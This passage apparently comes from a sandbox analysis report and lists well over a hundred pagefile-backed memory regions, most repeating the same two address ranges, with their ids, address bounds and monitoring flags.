start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8755 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8756 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8757 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8758 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8759 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8760 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8761 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8762 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8763 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8764 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8765 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8766 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8767 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8768 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8769 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8770 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8771 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8772 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8773 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8774 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8775 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8776 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8777 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8778 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8779 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8780 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8781 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8782 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8783 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8784 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8785 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8786 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8787 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8788 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8789 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8790 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8791 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8792 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8793 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8794 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8795 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8796 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8797 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8798 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8799 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8800 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8801 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8802 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8803 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8804 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8805 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8806 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8807 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8808 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8809 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8810 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8811 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8812 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8813 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8814 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8815 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8816 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8817 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8818 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8819 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8820 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8821 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8822 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8823 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8824 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8825 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8826 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8827 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8828 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8829 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8830 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8831 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8832 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8833 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8834 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8835 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8836 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8837 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8838 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8839 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8840 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8841 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8842 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8843 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8844 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8845 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8846 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8847 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8848 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8849 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8850 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8851 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8852 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8853 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8854 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8855 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8856 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8857 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8858 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8859 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8860 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8861 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8862 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8863 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8864 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8865 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8866 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8867 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8868 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8869 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8870 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8871 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8872 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8873 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8874 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8875 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8876 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8877 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8878 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8879 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8880 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8881 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8882 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8883 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8884 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8885 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8886 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8887 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8888 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8889 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8890 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8891 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8892 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8893 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8894 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8895 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8896 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8897 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8898 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8899 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8900 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8901 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8902 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8903 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8904 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8905 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8906 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8907 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8908 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8909 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8910 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8911 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8912 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8913 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8914 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8915 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8916 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8917 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8918 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8919 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8920 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8921 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8922 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8923 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8924 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8925 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8926 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8927 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8928 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8929 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8930 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8931 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8932 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 